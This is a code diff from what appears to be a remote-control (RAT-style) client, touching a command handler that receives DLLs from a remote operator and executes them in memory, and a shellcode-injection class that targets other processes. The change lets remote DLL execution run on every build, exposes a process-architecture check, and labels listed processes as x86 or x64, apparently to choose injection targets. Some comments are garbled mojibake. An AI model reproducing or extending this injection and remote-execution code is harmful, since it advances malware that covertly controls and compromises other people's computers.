Feature: Support anti black-screen in process management

client/KernelManager.cpp

@@ -485,7 +485,6 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
         break;
     }
     case CMD_EXECUTE_DLL: {
-#ifdef _WIN64
         static std::map<std::string, std::vector<BYTE>> m_MemDLL;
         const int sz = 1 + sizeof(DllExecuteInfo);
         if (ulLength < sz)break;
@@ -525,7 +524,6 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
             CloseHandle(__CreateThread(NULL, 0, ExecuteDLLProc, new DllExecParam(*info, param, data), 0, NULL));
             Mprintf("Execute '%s'%d succeed - Length: %d\n", info->Name, info->CallType, info->Size);
         }
-#endif
         break;
     }
 

client/ShellcodeInj.h

@@ -55,6 +55,44 @@ public:
         return m_buffer ? InjectShellcode(pid, (BYTE*)m_buffer, m_length, m_userFunction, m_userData, m_userLength) : false;
     }
 
+	// Check if the process is 64bit.
+	static bool IsProcess64Bit(HANDLE hProcess, BOOL& is64Bit)
+	{
+		is64Bit = FALSE;
+		BOOL bWow64 = FALSE;
+		typedef BOOL(WINAPI* LPFN_ISWOW64PROCESS2)(HANDLE, USHORT*, USHORT*);
+		HMODULE hKernel = GetModuleHandleA("kernel32.dll");
+
+		LPFN_ISWOW64PROCESS2 fnIsWow64Process2 = hKernel ?
+			(LPFN_ISWOW64PROCESS2)::GetProcAddress(hKernel, "IsWow64Process2") : nullptr;
+
+		if (fnIsWow64Process2) {
+			USHORT processMachine = 0, nativeMachine = 0;
+			if (fnIsWow64Process2(hProcess, &processMachine, &nativeMachine)) {
+				is64Bit = (processMachine == IMAGE_FILE_MACHINE_UNKNOWN) &&
+					(nativeMachine == IMAGE_FILE_MACHINE_AMD64 || nativeMachine == IMAGE_FILE_MACHINE_ARM64);
+				return true;
+			}
+		}
+		else {
+			// Old system use IsWow64Process
+			if (IsWow64Process(hProcess, &bWow64)) {
+				if (bWow64) {
+					is64Bit = FALSE;    // WOW64 <20><> һ<><D2BB><EFBFBD><EFBFBD> 32 λ
+				}
+				else {
+#ifdef _WIN64
+					is64Bit = TRUE;     // 64 λ<><CEBB><EFBFBD>򲻻<EFBFBD><F2B2BBBB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 32 λϵͳ <20><> Ŀ<><C4BF>һ<EFBFBD><D2BB><EFBFBD><EFBFBD>64λ
+#else
+					is64Bit = FALSE;    // 32 λ<><CEBB><EFBFBD><EFBFBD><EFBFBD>޷<EFBFBD><DEB7>ж<EFBFBD>Ŀ<EFBFBD><C4BF><EFBFBD>Ƿ<EFBFBD>64λ <20><> <20><><EFBFBD><EFBFBD>Ϊfalse
+#endif
+				}
+				return true;
+			}
+		}
+		return false;
+	}
+
 private:
     BYTE* m_buffer = NULL;
     int m_length = 0;
@@ -125,32 +163,6 @@ private:
         return pid;
     }
 
-    // Check if the process is 64bit.
-    bool IsProcess64Bit(HANDLE hProcess, BOOL& is64Bit)
-    {
-        BOOL bWow64 = FALSE;
-        typedef BOOL(WINAPI* LPFN_ISWOW64PROCESS2)(HANDLE, USHORT*, USHORT*);
-        HMODULE hKernel = GetModuleHandleA("kernel32.dll");
-
-        LPFN_ISWOW64PROCESS2 fnIsWow64Process2 = hKernel ?
-            (LPFN_ISWOW64PROCESS2)::GetProcAddress(hKernel, "IsWow64Process2") : nullptr;
-
-        if (fnIsWow64Process2) {
-            USHORT processMachine = 0, nativeMachine = 0;
-            if (fnIsWow64Process2(hProcess, &processMachine, &nativeMachine)) {
-                is64Bit = (processMachine == IMAGE_FILE_MACHINE_UNKNOWN) && (nativeMachine == IMAGE_FILE_MACHINE_AMD64);
-                return true;
-            }
-        } else {
-            // Old system use IsWow64Process
-            if (IsWow64Process(hProcess, &bWow64)) {
-                is64Bit = sizeof(void*) == 8 ? TRUE : !bWow64;
-                return true;
-            }
-        }
-        return false;
-    }
-
     // Check if it's able to inject.
     HANDLE CheckProcess(DWORD pid)
     {

client/SystemManager.cpp

@@ -13,6 +13,7 @@
 #endif
 
 #include <Psapi.h>
+#include "ShellcodeInj.h"
 
 #pragma comment(lib,"psapi.lib")
 
@@ -91,11 +92,15 @@ LPBYTE CSystemManager::GetProcessList()
                 if (dwReturn==0) {
                     strcpy(szProcessFullPath,"");
                 }
-
+                BOOL is64Bit;
+                ShellcodeInj::IsProcess64Bit(hProcess, is64Bit);
+                const char* arch = is64Bit ? "x64" : "x86";
+                char exeFile[300];
+                sprintf(exeFile, "%s:%s", pe32.szExeFile, arch);
                 //<2F><>ʼ<EFBFBD><CABC><EFBFBD><EFBFBD>ռ<EFBFBD>õĻ<C3B5><C4BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>ǹ<EFBFBD><C7B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ķ<EFBFBD><C4B7>͵<EFBFBD><CDB5><EFBFBD><EFBFBD>ݽṹ
                 // <20>˽<EFBFBD><CBBD><EFBFBD>ռ<EFBFBD><D5BC><EFBFBD><EFBFBD><EFBFBD>ݴ<EFBFBD>С
                 dwLength = sizeof(DWORD) +
-                           lstrlen(pe32.szExeFile) + lstrlen(szProcessFullPath) + 2;
+                           lstrlen(exeFile) + lstrlen(szProcessFullPath) + 2;
                 // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̫С<CCAB><D0A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7><EFBFBD><EFBFBD><EFBFBD>
                 if (LocalSize(szBuffer) < (dwOffset + dwLength))
                     szBuffer = (LPBYTE)LocalReAlloc(szBuffer, (dwOffset + dwLength),
@@ -107,8 +112,8 @@ LPBYTE CSystemManager::GetProcessList()
                 memcpy(szBuffer + dwOffset, &(pe32.th32ProcessID), sizeof(DWORD));
                 dwOffset += sizeof(DWORD);
 
-                memcpy(szBuffer + dwOffset, pe32.szExeFile, lstrlen(pe32.szExeFile) + 1);
-                dwOffset += lstrlen(pe32.szExeFile) + 1;
+                memcpy(szBuffer + dwOffset, exeFile, lstrlen(exeFile) + 1);
+                dwOffset += lstrlen(exeFile) + 1;
 
                 memcpy(szBuffer + dwOffset, szProcessFullPath, lstrlen(szProcessFullPath) + 1);
                 dwOffset += lstrlen(szProcessFullPath) + 1;